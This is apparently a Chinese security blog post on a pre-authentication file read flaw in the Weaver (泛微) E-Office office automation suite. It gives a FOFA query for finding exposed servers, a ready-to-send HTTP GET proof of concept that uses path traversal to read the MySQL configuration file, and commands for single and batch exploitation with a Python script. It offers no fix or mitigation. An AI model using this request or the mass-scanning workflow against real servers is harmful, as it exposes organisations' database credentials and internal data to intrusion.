泛微E-Office前台文件读取漏洞

一、漏洞描述

泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。泛微E-Office能够帮助企业实现全流程数字化、自动化,提高工作效率和管理质量,降低管理成本,为企业提供全面、高效、便捷的办公服务。

泛微E-Office前台文件读取漏洞。

二、网络空间搜索引擎查询

fofa查询

复制代码
 app="泛微-EOffice"

三、漏洞复现

poc

复制代码
GET /iweboffice/officeserver2.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../bin/mysql_config.ini HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

浏览器直接访问返回如下

四、批量检测与利用

单个检测与利用

复制代码
 python .\E-OfficeReadfile.py -u http://ip:port

批量检测

复制代码
 python .\E-OfficeReadfile.py -f filename

关注微信公众号 网络安全透视镜 回复 20231008-1 获取批量检测脚本

相关推荐
YakProject5 小时前
用 IRify 深入探索 WebShell 中的 Source/Sink 挖掘
网络安全
白山云北诗7 小时前
深度解读云防火墙(WAF):守护网络安全的智能卫士
安全·web安全·防火墙·waf·云防火墙·web应用防火墙
douluo9987 小时前
老飞飞bug及原理修复方法
安全·web安全
忘川w10 小时前
《网络安全与防护》知识点复习
笔记·安全·web安全·网络安全
Bruce_Liuxiaowei14 小时前
使用Nmap探测VNC服务信息—某单位KVM设备
网络·安全·web安全
qq_2430507914 小时前
aflplusplus:开源的模糊测试工具!全参数详细教程!Kali Linux教程!(三)
linux·网络安全·黑客·渗透测试·模糊测试·kali linux·黑客工具
安全系统学习16 小时前
网络安全之内核初级对抗技术分析
开发语言·python·算法·安全·web安全
炎码工坊16 小时前
DevSecOps实践:CI/CD流水线集成动态安全测试(DAST)工具
安全·网络安全·微服务·云原生·安全架构
Starshime19 小时前
PHP、Apache环境中部署sqli-labs
网络安全
盛满暮色 风止何安1 天前
BGP基础
运维·服务器·网络·网络协议·tcp/ip·网络安全·智能路由器